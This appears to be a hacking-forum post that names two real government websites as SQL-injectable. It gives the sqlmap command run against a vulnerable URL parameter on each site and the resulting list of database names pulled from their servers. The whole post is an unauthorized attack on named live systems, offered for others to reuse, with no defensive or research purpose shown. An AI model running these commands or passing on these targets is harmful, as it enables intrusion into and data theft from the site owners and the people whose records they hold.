2 site sqli vulnerability (1 Viewer)

X

x

sqlmap.py -u http://www.ircp.gov.tt/entity_master.php?id=PS1 --random-agent --threads=10 --dbs

Code:
[*] #mysql50#mysql-bin
[*] ag_support
[*] ap_front
[*] appgallop2
[*] appgallop_amit
[*] atul_app
[*] bakersladders
[*] bg
[*] bhatnagar
[*] bugs
[*] buyr_2017
[*] buyr_jewel
[*] cer_server
[*] certify
[*] certify_cms
[*] certify_new
[*] certify_teacher
[*] cios
[*] ciotial
[*] ciotialmainsite
[*] cloud_ecom
[*] coming_soon
[*] cumuluslive
[*] cumulusnext
[*] dhsacademy
[*] education
[*] emaaja
[*] foiexbrq_expo
[*] ga_app
[*] gosodeals
[*] hops
[*] hrm
[*] ind_expo
[*] information_schema
[*] jantashakti
[*] kts
[*] lms
[*] lms_db
[*] mysql
[*] nanyang
[*] new_com
[*] newsapi
[*] p_stage
[*] partnermanual
[*] partyn_party
[*] pgmed
[*] pmo
[*] pocial_live
[*] pocial_stage
[*] pvm
[*] sbms
[*] test
[*] test_master
[*] texas_demo
[*] vaysys_supportdesk
[*] vid
[*] vis
[*] webdesig_wdt

sqlmap.py -u http://cmguararema.sp.gov.br/pagina.asp?id=23 --random-agent --threads=10 --dbs

Code:
available databases [2]:
[*] information_schema
[*] lw13419509974f
 

Users who are viewing this thread

Top